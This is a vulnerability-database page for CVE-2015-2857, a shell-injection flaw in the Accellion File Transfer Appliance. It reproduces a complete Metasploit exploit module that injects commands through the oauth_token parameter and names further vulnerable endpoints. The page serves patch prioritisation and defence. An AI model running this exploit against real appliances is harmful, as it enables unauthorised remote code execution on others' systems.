CVE-2015-2857

critical

Published 2017-08-22 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

9.8

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Accellion File Transfer Appliance before FTA_9_11_210 allows remote attackers to execute arbitrary code via shell metacharacters in the oauth_token parameter.

Predictions

Exploit likelihood

97%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-37597 remote hardware verified ruby · 4 KB

Metasploit · 2015-07-13

Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)

ruby exploit Source: Exploit-DB

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Accellion FTA getStatus verify_oauth_token Command Execution',
      'Description'    => %q{
          This module exploits a metacharacter shell injection vulnerability in the Accellion
        File Transfer appliance. This vulnerability is triggered when a user-provided
        'oauth_token' is passed into a system() call within a mod_perl handler. This
        module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include
        '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on
        version FTA_9_11_200, but may apply to previous versions as well. This issue was
        fixed in software update FTA_9_11_210.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://r-7.co/R7-2015-08'],
          ['CVE', '2015-2857']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl bash telnet',
            }
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 10 2015'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true])
      ], self.class)
  end

  def check
    uri = '/tws/getStatus'

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'vars_post' => {
        'transaction_id' => rand(0x100000000),
        'oauth_token'    => 'invalid'
    }})

    unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/
      return Exploit::CheckCode::Safe
    end

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'vars_post' => {
        'transaction_id' => rand(0x100000000),
        'oauth_token'    => "';echo '"
    }})

    unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
      return Exploit::CheckCode::Safe
    end

    Msf::Exploit::CheckCode::Vulnerable
  end

  def exploit

    # The token is embedded into a command line the following:
    # `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;
    token = "';#{payload.encoded};echo '"

    uri   = '/tws/getStatus'

    # Other exploitable URLs:
    # * /seos/find.api (works with no other changes to this module)
    # * /seos/put.api  (requires some hoop jumping, upload)
    # * /seos/mput.api (requires some hoop jumping, token && upload)

    print_status("Sending request for #{uri}...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => uri,
      'vars_post' => {
        'transaction_id' => rand(0x100000000),
        'oauth_token'    => token
    }})

    if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
      print_status("Valid response received...")
    else
      if res
        print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
      else
        print_error("No reply received from the target")
      end
    end

    handler
  end

end

Metasploit modules

exploit_linux/http/accellion_fta_getstatus_oauth rank 600

Accellion FTA getStatus verify_oauth_token Command Execution

Source fetch failed: fetch_error — view the original via the link above.

Application impact

Vendor	Product	Versions	Fixed
accellion	file_transfer_appliance	`{"endIncluding":"9_11_200"}`

References

CWEs

CWE-77

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.